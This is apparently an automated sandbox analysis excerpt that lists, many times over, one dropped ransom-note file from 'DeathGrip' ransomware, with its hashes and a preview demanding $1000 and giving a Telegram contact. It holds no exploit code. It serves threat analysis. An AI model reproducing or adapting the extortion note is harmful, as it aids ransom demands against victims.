                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
